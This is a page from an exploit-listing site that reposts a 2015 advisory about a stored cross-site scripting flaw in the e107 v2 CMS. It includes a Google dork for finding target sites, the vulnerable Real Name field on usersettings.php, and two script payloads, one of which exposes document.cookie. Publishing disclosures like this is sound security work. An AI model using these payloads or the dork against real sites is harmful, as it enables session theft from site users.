Advertisement






e107 v2 Bootstrap CMS XSS Vulnerability

CVE Category Price Severity
CVE-2020-22999 CWE-79 $500 Medium
Author Risk Exploitation Type Date
Unknown High Remote 2015-11-19
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2015110174

Below is a copy:

e107 v2 Bootstrap CMS XSS Vulnerability########################################################
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
########################################################
# Google Dork: Proudly powered by e107
# Date: [19/11/2015]
# Exploit Author: Guardiran Security Team =>DeMoN
# Vendor Homepage: [http://e107.org/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.
# CMS user details section is vulnerable to XSS. You can run XSS payloads.
# XSS Vulnerability #1:
# Go Update user settings page
# "http://{target-url}/usersettings.php"
# Set Real Name value;
# "><script>alert(String.fromCharCode(88, 83, 83))</script>
# or
# "><script>alert(document.cookie)</script>
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN
########################################################


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum